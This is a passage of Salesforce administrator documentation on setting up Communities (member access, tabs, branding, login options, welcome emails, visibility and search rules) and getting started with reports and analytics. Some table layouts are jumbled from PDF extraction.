or Site.com to go to the site associated with this community.

After you finish your customizations, you need to publish the community to make it available to members. If welcome emails
are enabled when you publish, a welcome email is sent to all members. If any of those users are new portal users, their welcome
email includes their username and password.

See Also:
Communities Statuses
Publishing Communities
Who Can See What in Communities
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Communities Statuses
Available in: Unlimited, Developer, Enterprise Editions

Communities can have one of the following statuses.

DescriptionStatus

Customization of the community isn’t complete and it has never been published. Once you publish, you
can’t go back to Preview status.

Users with “Create and Manage Communities” can access communities in Preview status if their profile
or permission set is associated with the community. They can also share a link to these communities with
users whose profiles or permission sets are associated with the community.

Preview

No welcome emails are sent even if Send welcome email is selected.

Note: If your organization’s access to Communities is suspended for non-payment of fees due, all
of your communities are taken offline, including those in Preview status. When Communities is
enabled again, all communities are in Offline status. You can publish these communities, but
can’t return them to Preview status.

The community was previously Published but was taken offline.

You may want to take a community offline if you need to:

Offline

• Add or remove members
• Add, remove, or change the order of tabs
• Change the color scheme
• Change the community URL

Users with “Create and Manage Communities” can still access the setup for Offline communities regardless
of membership. Members see an error page if they attempt to access Offline communities, but they still
appear in the drop-down as Community Name (Offline).

The community is published and available to members.

Welcome emails are sent to new members if Send welcome email is selected.

Published

See Also:
Customizing Communities
Taking a Community Offline
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Adding Members to Your Community
Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Create and Manage Communities”To create, customize, or publish a community:

Manage community membership by adding profiles and permission sets during the setup process. Using profiles and permission
sets, you can:

• Easily grant or remove access for groups of users. Once you add a profile or permission set, all users assigned to that profile
or permission set become members of the community.

• Enforce a membership policy. New users added to a profile or permission set that is already associated with a community
automatically gain access.

Permission sets allow added flexibility for adding members. You can grant community access to a subset of users from the
same profile, without needing to clone the profile.

Standard, Chatter, and portal profiles can be added to communities; Chatter customers, from private groups with customers,
can’t be added to communities even if they’re assigned permission sets that are associated with communities.

Note:  Profiles and permission sets associated with communities can’t be deleted from Salesforce. You must remove
the profiles or permission sets from the communities first.

1. Click Customize > Communities > Manage Communities, then click Edit next to the community name.
2. Click Members.
3. To add profiles:

a. To filter profiles, select a profile type from the drop-down menu. To search for a specific profile, enter a search term
and click Find.

Search returns profiles for the selected filter.

b. Select the user profiles you want to allow access to your community. Press CTRL to select multiple profiles.
c. Click Add. To remove a profile, select it and click Remove.

If you remove a profile from a community, users with that profile lose access to the community, unless the users are
assigned permission sets or other profiles that are still part of the community. Their posts and comments still appear.

4. To add permission sets:

a. To search for a specific permission set, enter a search term and click Find.
b. Select the permission sets you want to allow access to your community. Press CTRL to select multiple permission sets.
c. Click Add.

If you remove a permission set from a community, users with that permission set lose access to the community, unless
the users are associated with profiles or other permission sets that are still part of the community. Their posts and
comments still appear even after they lose access.

5. Click Save.
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If the community is Published and welcome emails are enabled, users with the profiles or permission sets you added
receive a welcome email. The welcome email includes a username and a change password link if it is sent to an external
user who hasn’t logged in to a portal or community yet.

When the community is Published, welcome emails are sent and the community is discoverable by members. When a
community is in Preview status, only members with the login URL can view the community. If a community is Offline,
only users with the “Create and Manage Communities“ permission can access it through the Community menu, regardless
of membership.

There are additional options for granting access to your community:

• Enable self-registration so that external users can register on their own
• Enable authentication providers, such as Facebook, so that external users can log into the community without creating an

account

For more information, see Customizing Communities Login.

See Also:
Customizing Communities

Adding Tabs to Your Community
Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Create and Manage Communities”To create, customize, or publish a community:

After you identify the features you want your community members to see, you can expose those features by choosing the
corresponding tabs during setup. Remember that profiles control access to tabs, so some tabs you choose may be hidden for
profiles associated with the community. In that case, you’ll need to manually expose the tabs in the profile so that those users
can see the tabs in the community.

Keep in mind that the tabs you enable should be required for the type of activity you’re performing in this community, whether
it be sharing accounts and opportunities with your partners or sharing cases and solutions with customers who need support.
You don’t want to clutter your community with tabs that users don’t really need.

Note: Chatter Free users in your community won’t see any tabs except the Chatter tab.

1. Click Customize > Communities > Manage Communities, then click Edit next to the community name.
2. Click Tabs.
3. Select the tabs to include in your community from the Available Tabs list. Press CTRL to select multiple tabs.
4. Click Add to add the tab. To remove a tab, select it in the Selected Tabs list and click Remove.
5. Click Up or Down to change the order that the tabs display.

The tab at the top of the list is the landing tab for the community. When users access the community, it will be the first
tab they see.
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Note:  If any user doesn’t have access to the landing tab and Chatter is disabled, we show them the Home tab. If
Chatter is enabled, we show the Chatter tab.

6. Click Save.

See Also:
Customizing Communities
Renaming the Chatter Tab

Renaming the Chatter Tab
Most likely, many of your community members will use the Chatter tab as their home base. You can customize it to meet
your company’s branding.

Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Customize Application”

OR

“View Setup and Configuration”

AND

Be designated as a translator

To rename the Chatter tab:

The Chatter tab is the fastest way for your community members to see what’s most important to them: activity feeds, groups,
bookmarks, files, and more. Many of your community members will most likely use the Chatter tab as their home base.
Customize the name of the Chatter tab in your community to match your company branding—for example, you can use your
company’s name or any other name that would be recognizable to your members.

1. From Setup, click Customize > Tab Names and Labels > Rename Tabs and Labels.
2. Select your default language from the Select Language drop-down list at the top of the page.
3. Under Chatter Tabs in Communities, click Edit next to the community you want to edit.
4. Type the singular and plural versions of your preferred tab name, for example, Partner and Partners. Select Starts with

a vowel sound if appropriate.
5. Click Save.
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Branding Your Community
Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Create and Manage Communities”To create, customize, or publish a community:

Customize the look and feel of your community by adding your company logo, colors, and copyright. This ensures that your
community matches your company’s branding and is instantly recognizable to your community members.

1. Click Customize > Communities > Manage Communities, then click Edit next to the community name.
2. Click Branding.
3. Use the lookups to choose a header and footer for the community.

The files you’re choosing for header and footer must have been previously uploaded to the Documents tab and must be
publicly available. The header can be .html, .gif, .jpd, or .png. The footer must be an .html file. The maximum file size
for .html files is 100 KB combined. The maximum file size for .gif, .jpg, or .png files is 20 KB. So, if you have a header
.html file that is 70 KB and you want to use an .html file for the footer as well, it can only be 30 KB.

The header you choose replaces the Salesforce logo below the global header. The footer you choose replaces the standard
Salesforce copyright and privacy footer.

4. Click Select Color Scheme to select from predefined color schemes or click the text box next to the page section fields to
select a color from the color picker.

Note that the colors selected impact your community login page as well.

Where it AppearsColor Choice

Top of the page, under the black global header. If an HTML file is selected in the Header field,
it overrides this color choice.

Top of the login page.

Header Background

Background color for all pages in your community, including the login page.Page Background

Tab that is selected.Primary

Top borders of lists and tables.

Button on the login page.

Secondary

Background color for section headers on edit and detail pages.Tertiary

5. Click Save.

See Also:
Customizing Communities

2551

Branding Your CommunityCommunity Customization



Customizing Communities Login
Customize the look and feel of your community login page, from the logo and footer to login options for external users.

Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Create and Manage Communities”To create, customize, or publish a community:

The colors used on the login page are inherited from the community branding color scheme. You can customize these other
elements of the page.

1. Click Customize > Communities > Manage Communities, then click Edit next to the community name.
2. Click Login Page.
3. Upload a logo for the community login page header.

The file can be .gif, .jpg, or .png. The maximum file size is 100 KB. Images larger than 250 pixels wide or 125 pixels high
aren’t accepted. Uploading a logo automatically creates a Communities Shared Document Folder on the Documents tab
and saves the logo there. Once created, you can’t delete the folder.

The header logo displays at the top left of the login page.
4. Enter custom text for the community login page footer, up to a maximum of 120 characters.

The footer displays at the bottom of the login page.

5. Choose the login options to make available to external users on the community login page.

External users are users with Community, Customer Portal, or partner portal licenses.

What Displays on the Login PageLogin Options for External Users

The option to log in using the
username and password that the user

Username and password to log in to Organization Name

was assigned for the community.
This is the default login option.

The option to Log In with Single
Sign-On using the user’s SAML
single sign-on identity.

If you have enabled multiple SAML
single sign-on options, each login

SAML for single sign-on

This option is available only if your organization has successfully set up both of the
following.

• SAML settings for single sign-on, which enables login to Salesforce using your
corporate identity provider. button displays labeled with the

SAML configuration’s Name field.• A custom Salesforce domain name, which changes the application URLs for all
of your pages, including login pages. Contact Support if you need to enable My
Domain.

You can offer users multiple SAML single sign-on options if you Enable Multiple
Configs from Setup, in Security Controls > Single Sign-On Settings. If you already
had SAML enabled and you then enable multiple SAML configurations, your
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What Displays on the Login PageLogin Options for External Users

existing SAML configuration is automatically converted to work with multiple
additional configurations.

The option to log in using
credentials from an external service

External authentication providers

These options are available if you enable them from Setup, in Security Controls >
Auth. Providers. provider such as Facebook©,

Janrain©, or Salesforce.

A Not a member? link that directs
external users to the self-registration
page.

Self-registration

Rather than relying solely on community administrators to add members, you can
Allow external users to self-register. When your organization enables
Communities, a default set of self-registration Visualforce pages and associated Apex
controllers are created.

Important: You must specify in the default controller which profiles, roles
(required for external users with partner portal or Partner Community
licenses), and account the self-registration process should assign users to.
The self-registration feature won’t work until you specify these details.

6. Click Save.

Your selected login options will be visible to all users on the login page. However, they’re valid only for external users. Internal
users who try to use these options will get a login error. They must use the link that directs employees to Log in here and log
in with their Salesforce username and password.

See Also:
Customizing Communities

Customizing Communities Email
Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Create and Manage Communities”To create, customize, or publish a community:

You can customize email sender information, Chatter email branding, and templates in your community emails. You can
perform customizations in either the user interface or the Network object in Salesforce APIs.

1. Click Customize > Communities > Manage Communities, then click Edit next to the community name.
2. Click Emails.
3. Enter custom values for the email sender’s name and address to replace the default values.
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Note: If you change the sender’s email address, we send a verification email to the new address. The change is
pending, and we continue to use the existing address while we await verification. The requested address doesn’t
take effect until you click the confirmation link in the email, which is valid for 72 hours. If verification is already
pending for a new email address and you specify a different new address, we retain the latest value and use that
for verification.

4. Customize what displays in the footer of community Chatter emails.

Important:  Both a logo and email footer text are required. Keep in mind that:

• All Chatter emails display the Chatter logo and salesforce.com information by default unless you replace them
with your organization’s own logo and information.

• If you previously customized the logo or footer text and want to restore the default values, use the API to set
these fields to null.

a. Choose a logo to replace the default Chatter logo.

The logo must be an existing document in the Documents tab and must be marked Externally Available Image.
Images with a maximum size of 150 x 50 pixels on a transparent background work best.

b. Enter custom text to replace the default footer text, up to a maximum of 1,000 characters.

The default text includes salesforce.com's name and physical address. We strongly recommend including your
organization’s physical address to comply with applicable anti-spam laws.

c. Click Preview before saving to make sure your changes display properly in a sample Chatter email.

If your web browser blocks popup windows, you won’t be able to view the preview window.

5. Select Send welcome email to send email to users when they’re added to the community.
Welcome emails are sent when:

• A community changes from Preview status to Published status. Emails are not sent when a community is in
Preview or Offline status.

• An administrator adds a new profile or permission set to a Published community.
• A user is assigned a profile or permission set that is part of a Published community.

Note:  If a profile or permission set is part of multiple communities, users with that profile or permission set
receive a welcome email from each community.

6. Use the default email templates or use the lookups to select different templates for welcome emails to new community
members, forgotten password emails, and notification emails about reset passwords. If your organization uses email templates
to submit case comments, you can select a template (none is provided by default).

You can customize any default template.

Note:  If you customize the contents of an email template, we recommend that you use the {!Community_Url}
merge field. This custom merge field populates the unique URL for a community, ensuring that emails to users
contain URLs with the correct parameters and direct users to the appropriate community to log in or change a
password.

7. Click Save.

Another way to customize community emails is to use these fields on the API Network object.
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• CaseCommentEmailTemplateId—ID of the email template used when submitting a comment on a case.
• ChangePasswordEmailTemplateId—ID of the email template used when notifying a user that their password has

been reset.
• EmailFooterLogoId—ID of the Document object that displays as an image in the footer of community Chatter emails.
• EmailFooterText—Text that displays in the footer of community Chatter emails.
• EmailSenderAddress—Read only. Email address from which community emails are sent.
• EmailSenderName—Name from which community emails are sent.
• ForgotPasswordEmailTemplateId—ID of the email template used when a user forgets their password.
• NewSenderAddress—Email address that has been entered as the new value for EmailSenderAddress but has not

been verified yet. After a user has requested to change the sender email address and has successfully responded to the
verification email, the NewSenderAddress value overwrites the value in EmailSenderAddress. This becomes the
email address from which community emails are sent.

◊ If verification is pending for a new email address and you set NewSenderAddress to null, this cancels the verification
request.

◊ NewSenderAddress is automatically set to null after EmailSenderAddress has been set to the new verified address.
◊ If verification is pending for a new email address and you specify a different new address for this field, only the latest

value is retained and used for verification.

• OptionsSendWelcomeEmail—Determines whether a welcome email is sent when a new user is added to the community.
• WelcomeEmailTemplateId—ID of the email template used when sending welcome emails to new community members.

See Also:
Customizing Communities

Publishing Communities
Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Create and Manage Communities”To create, customize, or publish a community:

Publishing a community makes it visible to members. If you want to customize it further after publishing, you can do so while
the community is published or take the community offline. Keep in mind that once you publish, everything in the community
is visible to members. Be sure to finish all major customizations while in Preview status.

Note:  If welcome emails are enabled, an email with a link to the community is sent to each member when the
community is published. For any members from outside the company who don’t have a password or use single sign-on,
the welcome email includes a link to set their password and security question.

An external user with access to multiple communities within one organization uses the same login credentials for all
communities.

1. Go to the Community settings page:

a. Click Customize > Communities > Manage Communities.

2555

Publishing CommunitiesCommunity Customization



b. Click Customize next to the community name.

2. Click Publish.
Your community is online.

See Also:
Communities Statuses
Customizing Communities
Taking a Community Offline

Taking a Community Offline
Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Create and Manage Communities”To create, customize, or publish a community:

You may want to take a community offline if you need to:

• Add or remove members
• Add, remove, or change the order of tabs
• Change the color scheme
• Change the community URL

1. To take a community offline, go to the Community Settings page:

a. Click Customize > Communities > Manage Communities.
b. Click Customize next to the community name.

2. Click Take Offline.

Your community is offline.

When a community is offline, members still see it in the menu, but can’t access it unless they have the “Create and Manage
Communities” permission.

See Also:
Communities Statuses
Customizing Communities
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Search Behavior in Communities
In general, searches within a community return results specific to that community. Search behavior also depends on whether
Chatter is enabled in your organization.

Available in: Unlimited, Developer, Enterprise Editions

If Chatter is enabled in your organization, global search and contextual feed search are enabled by default in all communities.
If Chatter isn’t enabled, sidebar search is enabled in all communities. With global search, users can search for records, files,

people, groups, topics, and feed posts and comments. Feed search ( ) is helpful when users want to look for information
in a specific feed context, such as in groups, on a user’s profile, in a record feed, or in the community feed. Sidebar search
doesn’t support searches for items specific to Chatter, such as feeds, groups, files, topics, and user profiles. For detailed
information about global search, feed search, and sidebar search behavior, refer to the online help.

Search behavior in communities is different from searches in the internal organization:

• In general, searches within a community return matches from within the community. To find items from a different
community, users must leave the current community and search from within the other community.

• In search results in a community, users can see what they have access to through their profiles or permission sets in addition
to what is explicitly shared with them in the community. This may include internal company content and records not
explicitly shared in the community. For example, if the user’s profile allows access to account information, and the accounts
tab isn’t made visible in the community, the user is able to access account information from their search results.

• Search results for records and files are not limited to data made visible within the community. Record search results include
all the records a user has access to across all communities, including the internal organization’s records if they have access.
In file searches, users can see:

◊ Files they own
◊ Files shared with them directly
◊ Files they have access to in a library
◊ Files that are posted to a record they have access to
◊ Files that are posted to groups or shared with that community

• To enable search result filters for an object in a community, the administrator must enable them for that object from within
the internal organization.

Who Can See What in Communities
Available in: Unlimited, Developer, Enterprise Editions

Communities contain various types of users who require varying levels of access. What a user sees depends upon their user
type and which tabs the administrator selects when creating the community. The behavior outlined below also does not take
into account updates to your sharing model or user sharing.
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External Community
Member (Customer Portal,
Partner Portal, Partner
Community, or Customer
Community license)

Salesforce Community
Member (all Salesforce
licenses including Chatter
Free and Chatter Only)

Administrator or Salesforce
user with “Create and
Manage Communities”
permission

NoNoCan create, customize tabs and
branding, add or remove

Manage communities in
Salesforce

members, and publish or take
offline. User must also have
the “Customize Application”
permission to create or
customize communities.

The drop-down in the global
header shows a list of

The drop-down in the global
header shows a list of

The drop-down in the global
header shows a list of

Global Header

communities the user has
access to.

Can’t access communities in
Offline status. Can see

communities the user created
or has access to. Also links
back to their internal
organization.

Can’t access communities in
Offline status. Can see

communities the user created
or has access to. Also links
back to their internal
organization.

Can access setup for all
communities regardless of
status.

communities in Preview
status if a link is provided.

communities in Preview
status if a link is provided.Can see communities in

Preview status.

Can see a My Settings menu,
an Edit Contact Info menu,

Same as in internal
organization.

Chatter Free users see a My
Settings menu, an Edit

Same as in internal
organization.

Your Name menu in Global
Header

and a Logout link. For
external users, the My Settings
menu opens an overlay whereContact Info menu, and a they can update locationLogout link. For Chatter Free settings, security settings,users, the My Settings menu email settings, and approvedopens an overlay where they connections. These settingscan update location settings, apply across all communitiessecurity settings, email that users have access to. Thissettings, and approved overlay is different from theconnections. These settings My Settings page that otherapply across the internal internal users see if theorganization and all organization has enabled the
improved Setup user interface.communities that users have

access to. This overlay is
different from the My Settings
page that other internal users
see if the organization has
enabled the improved Setup
user interface.

Not availableStandard Salesforce user sees
Salesforce Online Help.

Can see Salesforce Online
Help.

Salesforce Online Help

Chatter Free user sees Chatter
help.
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External Community
Member (Customer Portal,
Partner Portal, Partner
Community, or Customer
Community license)

Salesforce Community
Member (all Salesforce
licenses including Chatter
Free and Chatter Only)

Administrator or Salesforce
user with “Create and
Manage Communities”
permission

Can see everyone else in the community and vice versa.People

Can see all members’ First
Name, Last Name, and

Can see all contact information fields (such as Title, Work
Phone, and Email) on all community members’ profiles. In

Profiles and people hovers

Nickname fields and profilepeople hovers, user always sees members’ Title, Work Phone,
and Mobile Phone fields. photos, but can only see

additional contact information
fields that members have
chosen to show to external
users. By default, Title is
shown while all other fields
are not. In people hovers, user
sees Title, Work Phone, and
Mobile Phone fields only if
the member has chosen to
show them.

Can see records they have
access to (based on sharing

Standard Salesforce user sees
records they have access to

Can see records they have
access to (based on sharing

Records (such as accounts,
leads, opportunities)

rules and permissions) across
all communities.

(based on sharing rules) across
all communities and their
internal organization. Chatter

rules) across all communities
and their internal
organization.

Free user doesn’t have access
to records.

Users with Partner
Community or partner portal

Can view and create dashboards and reportsDashboards and Reports

licenses can view dashboards
and reports for objects and
records that have a private
sharing model AND to which
the user has access to,
regardless of the current
community

Users with Customer Portal
or Customer Community
licenses don’t have access to
dashboards and reports.

Can see users who are
members of all communities

Can see all users across all communities and their internal
organization.

User Lookups on records

that the user is also a member
of, and other external users
associated with the same
external account. Users with
partner portal licenses also see
the owner of the portal
account.
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External Community
Member (Customer Portal,
Partner Portal, Partner
Community, or Customer
Community license)

Salesforce Community
Member (all Salesforce
licenses including Chatter
Free and Chatter Only)

Administrator or Salesforce
user with “Create and
Manage Communities”
permission

The Recently Viewed Users
list in the lookup shows all
users accessed across all
communities.

Visibility on the article’s
category.

Salesforce Knowledge User
License, Read permission on
the article type, and visibility
on the article’s category.

Salesforce Knowledge User
License, Read permission on
the article type, and visibility
on the category.

Salesforce Knowledge Articles

Chatter Visibility

External Community
Member (Customer Portal,
Partner Portal, Partner
Community, or Customer
Community license)

Salesforce Community
Member (all Salesforce
licenses including Chatter
Free and Chatter Only)

Salesforce Administrator

Within a community, user can
see all groups in the

Within a community, user can
see all groups for that

Within a community, user can
see all groups for that

Groups

community and join them, butcommunity and join them, butcommunity and join them, but
can’t see groups from othercan’t see groups from othercan’t see groups from other
communities they’re a member
of.

Can create new groups. In
groups user is a member of,

communities they belong to
or their internal organization.

Can create new groups. In
groups user is a member of,

communities they belong to
or their internal organization.

Can create new groups. In
groups user is a member of,

can post, comment, post filescan post, comment, post filescan post, comment, post files
or links, or share someone
else’s post.

or links, or share someone
else’s post.

or links, or share someone
else’s post.

Administrators can also
control whether users in the
organization and external users
can create new groups through
the “Create and Own New
Chatter Groups” user
permission.

Regardless of the current
community, users see files they

Regardless of the current community, users see Chatter files
they own, that are shared with them directly, that they have

Files

own, that are shared withaccess to in a library, or that are posted to a record they have
access to.

Files posted to groups and shared with an entire community
can only be viewed in that community.

them directly, or that they
have access to in a library.
Portal users see files posted to
records they have access to,
unless the record post was
marked “Internal Only”.
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External Community
Member (Customer Portal,
Partner Portal, Partner
Community, or Customer
Community license)

Salesforce Community
Member (all Salesforce
licenses including Chatter
Free and Chatter Only)

Salesforce Administrator

Can see profiles for all
members in the current

Can see profiles for all members in the current community.Profiles

community. Cannot see
profiles of users in the internal
organization.

Profile visibility enforces user
sharing.

User gets people, group, file, and record recommendations for the current community only.Recommendations

Can see activity statistics and
influence for the current
community.

All activity on records, such as
posts and comments, is not

Can see activity statistics and influence for the current
community.

All activity on records, such as posts and comments, is counted
in the user’s internal organization and not in the community
where the activity occurred.

Activity and Influence

counted in the user’s activity
statistics and influence.

Email notification preferences
are set by community. Within

Email notification preferences
are set by community. Within

Email notification preferences
are set by community. Within

Email Notifications

a community, external usersa community, standarda community, users can
can control their Chatter emailSalesforce user can controlcontrol their Chatter email
notifications under Yourtheir Chatter emailnotifications in their personal

settings.

Can control email
notifications for their internal

Name > My Settings > Email
Settings. Portal users can also
control group email
notifications on each group’s
page.

Chatter personal email digests
and group digests are not
supported in Communities.

notifications in their personal
settings.

Can control email
notifications for their internal
organization from Your Name
> My Settings > Chatter >
Email Notifications.

Chatter Free user can control
Chatter emails for their

organization from Your Name
> My Settings > Chatter >
Email Notifications.

Within a community, all users
can control group email
notifications on each group’s
page. communities under Your

Name > My Settings > EmailChatter personal email digests
and group digests are not
supported in Communities.

Settings. The chosen settings
apply to the current
community.

Within a community, all users
can control group email
notifications on each group’s
page.

Chatter personal email digests
and group digests are not
supported in Communities.
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External Community
Member (Customer Portal,
Partner Portal, Partner
Community, or Customer
Community license)

Salesforce Community
Member (all Salesforce
licenses including Chatter
Free and Chatter Only)

Salesforce Administrator

Can see hashtag topics and Chatter topics, including topics in feeds, the topics list, topic
detail pages, Trending Topics, and Recently Talked About topics for the current community
only.

Topics

Can add only topic favorites
in the current community.

Can add search, topic, and list view favorites in the current
community.

Favorites

Feeds Visibility

The following table shows what each kind of user can do or see in Chatter Feeds within a community.

External Community
Member (Customer Portal,
Partner Portal, Partner
Community, or Customer
Community license)

Salesforce Community
Member

Salesforce Administrator

Can post on any records
within the community to
which the user has access.

Can post on any records
within the community to
which the user has access.

Can post on any records
within the community.

Post on a record

Can bookmark posts within the current community. The Bookmarked feed only contains
posts from the current community.

Bookmark a post

Can mention people specific
to the current community.

Can mention people specific to the current community. User
can’t mention an external user on an internal post.

Mention someone

Can share a post only in the current community.Share a post (repost)

Can add hashtag topics and Chatter topics to any posts within the current community. Topics
are specific to the current community and can’t be accessed from another community.

Add topics to a post

Search Visibility

Search behavior in communities varies slightly from the search in the internal organization. If Chatter is enabled in your
organization, global search and feed search are automatically enabled in communities. If Chatter isn’t enabled in your
organization, sidebar search is enabled. Chatter-specific items can only be searched via global search or feed search. Search
results respect sharing rules for all items by default. The following table describes what each type of user in a community can
see in search results.
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External Community
Member (Customer Portal,
Partner Portal, Partner
Community, or Customer
Community license)

Salesforce Community
Member

AdministratorSearch Results For

People specific to the current community.People

Users • Information in hidden fields on a profile is not searchable by other partners and
customers in the community, but is searchable by users in the company’s internal
organization.

• Portal users can’t search for users in the community when sidebar search is enabled.

Groups specific to the current community.Groups

Visibility in the current
community:

Visibility in the current community:Files
• Owned files

• Owned files• Files shared with the user in a public or private group
• Files shared with the user

in a public or private
group

• Files shared with the entire community

Visibility in any community:

• Files shared with the
entire community

• Files posted on accessible records and record feeds
• Salesforce CRM Content library files that the user has

access to Visibility in any community:

Files owned by a user are always visible in search results for
that user, regardless of how they were uploaded.

• Files posted on accessible
records and record feeds
(unless the file posted on
the record is marked
“Internal Only”)

• Salesforce CRM
Content library files that
the user has access to

Files owned by a user are
always visible in search
results for that user,
regardless of how they were
uploaded.

Topics specific to the current community.Topics

Feed posts and comments from within the community where the search is performed.

Global search returns information from all feed contexts. Contextual feed search ( )
returns information from within the context where the search is performed, such as from

Feeds

the feed on a user’s profile, a record, or a group. To find information in the feeds in a
different community, search from within that community.

Recently accessed items specific to the current community.Search Auto-Complete

Visibility for all items the
user has access to through

Visibility for all items the
user has access to through

Full visibility for all items
across all communities and
your internal organization.

Records (accounts, contacts, leads,
and so on)

their user profile or
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External Community
Member (Customer Portal,
Partner Portal, Partner
Community, or Customer
Community license)

Salesforce Community
Member

AdministratorSearch Results For

permission sets across all
communities.

their user profile or
permission sets across all
communities and your
internal organization.

Visibility for all items the
user has access to through

Visibility for all items the
user has access to through

Full visibility for all items
across all communities and
your internal organization.

Lookup searches on records

their user profile or
permission sets across all
communities.

their user profile or
permission sets across all
communities and your
internal organization.

Visibility on the article’s
category.

Salesforce Knowledge User
License, Read permission on
the article type, and visibility
on the article’s category.

Salesforce Knowledge User
License, Read permission
on the article type, and
visibility on the category.

Salesforce Knowledge Articles

See Also:
Customizing Communities

OTHER RESOURCES

Tip Sheets
In addition to online help, salesforce.com publishes printable documentation to help you learn about our features and successfully
administer Salesforce.

Salesforce Communities
• Getting Started With Salesforce Communities
• Migrating From Portals to Communities

Salesforce CRM Content
• Salesforce CRM Content Implementation Guide
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How Salesforce Analytics Works
Salesforce offers a powerful suite of analytics tools that work together to help you view and analyze your data.

Salesforce analytics consists of several integrated parts:

Report Types on page 2623

A report type defines the set of records and fields available to a report based on the relationships between a primary object
and its related objects. Reports display only records that meet the criteria defined in the report type. Salesforce provides
a set of pre-defined standard report types; administrators can create custom report types as well.

For example, an administrator can create a report type that shows only job applications that have an associated resume;
applications without resumes won't show up in reports using that type. An administrator can also show records that may
have related records—for example, applications with or without resumes. In this case, all applications, whether or not
they have resumes, are available to reports using that type.

Reports

A report returns a set of records that meets certain criteria, and displays it in organized rows and columns. Report data
can be filtered, grouped, and displayed graphically as a chart. Reports are stored in folders, which control who has access.

Dashboards on page 2756

Administrators control access to dashboards by storing them in folders with certain visibility settings. Dashboard folders
can be public, hidden, or restricted to groups, roles, or territories. If you have access to a folder, you can view its dashboards.

Follow a dashboard in Chatter to get updates about the dashboard posted to your feed.

Each dashboard has a running user, whose security settings determine which data to display in a dashboard. If the running
user is a specific user, all dashboard viewers see data based on the security settings of that user—regardless of their own
personal security settings. For dynamic dashboards, you can set the running user to be the logged-in user, so that each
user sees the dashboard according to his or her own access level.

Folders on page 2726

A folder is a place where you can store reports, dashboards, documents, or email templates. Folders can be public, hidden,
or shared, and can be set to read-only or read/write. You control who has access to its contents based on roles, permissions,
public groups, and license types. You can make a folder available to your entire organization, or make it private so that
only the owner has access.

Analytic Snapshots on page 2738

An analytic snapshot lets you report on historical data. Authorized users can save tabular or summary report results to
fields on a custom object, then map those fields to corresponding fields on a target object. They can then schedule when
to run the report to load the custom object's fields with the report's data. Analytic snapshots enable you to work with
report data similarly to how you work with other records in Salesforce.

ANALYZE YOUR SALESFORCE DATA
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For example, a customer support manager could set up an analytic snapshot that reports on the open cases assigned to
his or her team everyday at 5:00 PM, and store that data in a custom object to build a history on open cases from which
he or she could spot trends via reports. Then the customer support manager could report on point-in-time or trend data
stored in the custom object and use the report as a source for a dashboard component.

See Also:
Share Insights with Dashboards
Create Your Own Custom Report Type

GET STARTED

Get Started with Reports
Set up your reporting environment, use the report builder to create a basic report, and organize your reports to make it easy
to find information when you need it. In most cases, you can start with a standard report and customize it to your needs.

You can report on any data you have read or read/write access to. The available data varies depending on your sharing model,
but you can almost always report on data owned by or shared with users below you in the role hierarchy, regardless of your
sharing model. (Certain sharing models do not allow this.) Salesforce offers two ways to report on information owned by you
or users who report to you:

• Some reports have a View filter. Choose the “My team's” option, such as “My Team’s Opportunities,” to view data owned
by you and users below you in the role hierarchy.

• Some reports, such as opportunity and activity reports, have Hierarchy links that allow you to drill down to different data
sets based on the role or user hierarchy. If your organization uses territory management, in some reports these links are
based on the territory hierarchy.
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You can choose to sort the report by record owner or role when customizing the report.

See Also:
Find a Report
Run a Report
Get the Information You Need From the Reports Tab List View
The Report Run Page
Sort Report Results
Print a Report
Organize Reports
Customize the Reports Tab
Report Run Page Options
Improve Report Performance
Build a New Report
Gather Data with Reports
Organize Reports
Build a Report From a Template
Run a Report

Find a Report
Search for a report by name, description, or who created it or modified it last. Filter, sort, or search within a selected folder
to refine your results.

Available in: All editions except Database.com

User Permissions Needed

“Run Reports”To search for reports:

“Run Reports” AND access to dashboard folderTo search for dashboards:

1. On the Reports tab, type in the search box.

Search looks up all folders. Filters are set to All Items and All Types to display all of the folder’s contents.

Salesforce searches these fields: Name, Description, Last Modified By, or Created By. Results are based on an exact
match of what you typed with those fields.

If tagging is enabled and added to a custom report or dashboard, search by its tag in the global search box.

2. Refine results using these options:

Do thisTo refine results by

Select a filter:Type
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Do thisTo refine results by

• Reports

• Dashboards

• All Types

Type filters don't apply to report templates in standard report folders.

Select a filter:View

• All Items

• Recently Viewed

• Items I Created

• Items I’m Following

View filters don't apply to report templates in standard report folders.

Select a folder, then type in the search box.A selected folder

Filters are set to All Items and All Types to display all of the folder’s contents.

Click  for the column and select Sort Ascending or Sort Descending. Sorting applies to all items
in the list view, including the ones on subsequent pages.

Sorting

See Also:
Get Started with Reports
Share Insights with Dashboards
Get Started with Dashboards

Run a Report
To run a report, find it on the Reports tab and click the report name. Most reports run automatically when you click the name.
If you’re already viewing a report, click Run Report to run it immediately or schedule a future run.

Available in: All editions except Database.com

User Permissions Needed

“Run Reports”To run reports:

“Schedule Reports”To schedule reports:

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:
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If you don’t see any results, check the report for one of these conditions:

• The report didn’t return any data. Check your filter criteria to make sure some data is returned.
• Due to field-level security, you don’t have access to one of the groupings you selected.
• Your custom summary formula’s context didn’t match the chart settings. For example, if the formula is calculated for

Industry, but the chart doesn’t include Industry, no results are returned.
• Your values are out of the range of acceptable values. The maximum value allowed is 999999999999999. The minimum

value allowed is -99999999999999.

If your report returns more than 2,000 records, only the first 2,000 records are displayed. To see a complete view of your report
results, click Export Details.

If your report takes longer than 10 minutes to complete, Salesforce cancels the report. Try the following techniques to reduce
the amount of data in your report:

• Filter for your own records, rather than all records.
• Limit the scope of the data to a specific date range.
• Exclude unnecessary columns from your report.
• Hide the report details.

See Also:
Get Started with Reports
Run a Joined Report
The Report Run Page
The Report Run Page
Report Run Page Options
Report Run Page Options
Print a Report
Sort Report Results

Get the Information You Need From the Reports Tab List View
To see the information you want to see about your reports, you can resize, hide, reorder, sort columns, and select the number
of records to display in your list view on the Reports tab.

Available in: All editions except Database.com

User Permissions Needed

“Run Reports”To view the Reports tab:

• Customize your list view as follows:

DescriptionOption

Click and drag its right margin to the preferred size.To resize a column
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DescriptionOption

Click  > Columns on any column and deselect the column you want to hide.To hide a column

